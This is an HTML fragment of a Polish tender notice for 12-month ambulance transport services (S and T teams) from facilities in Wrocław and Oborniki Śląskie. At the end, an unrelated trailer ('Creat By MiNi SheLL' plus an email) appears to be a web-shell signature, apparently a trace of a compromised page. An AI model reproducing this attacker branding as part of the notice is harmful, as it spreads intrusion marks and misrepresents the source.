<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> transport zespołem specjalistycznym, zwanym dalej zespołem S

Przewóz pacjentów w pozycji leżącej i siedzącej realizowany  na wezwanie przez karetkę S  z co najmniej 3 osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, w tym lekarz systemu oraz pielęgniarka systemu lub ratownik medyczny)
z placówki Zamawiającego we Wrocławiu przy  ul. Grabiszyńskiej  105, we wszystkie dni  tygodnia, o każdej porze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4. - transport zespołem T
a) Przewóz pacjentów w pozycji leżącej  i siedzącej, przewóz krwi, środków krwiopochodnych i materiałów biologicznych, wraz  z pomocą kierowcy  przy pracach za i wyładunkowych, realizowany przez karetkę T wraz  z kierowcą (sanitariusza zapewnia Zamawiający. Jeżeli jednak Zamawiający zamówi u Wykonawcy sanitariusza dzień wcześniej - wykonawca ma obowiązek sanitariusza zapewnić), podstawioną przez Wykonawcę w dni robocze od  poniedziałku do  piątku w godz.  7:30-14.30 w placówce Zamawiającego w Obornikach  Śląskich, przy ul. Dunikowskiego 2-8.
b) Przewóz pacjentów w pozycji leżącej  i siedzącej wraz  z pomocą kierowcy i sanitariusza przy  pracach za i wyładunkowych  realizowany na  wezwanie przez karetkę T z kierowcą i sanitariuszem, z placówki Zamawiającego w Obornikach Śląskich, przy ul. Dunikowskiego 2-8, w dni robocze od 14:30 do 7:30, a także  w dni ustawowo wolne. W wyjątkowych sytuacjach - Przewóz krwi,  środków krwiopochodnych i materiałów biologicznych, realizowany na  wezwanie przez karetkę T z kierowcą, z placówki Zamawiającego  w Obornikach Śląskich, w dni robocze od 14.30  do 7:30 a także w dni  ustawowo wolne. 
c) W szczególnych przypadkach, w celu, zakresie i na warunkach określonych w zadaniu 4 lit b), Wykonawca jest zobowiązany do udostępnienia w godzinach 7:30 - 14:30 dodatkowej karetki T na wezwanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com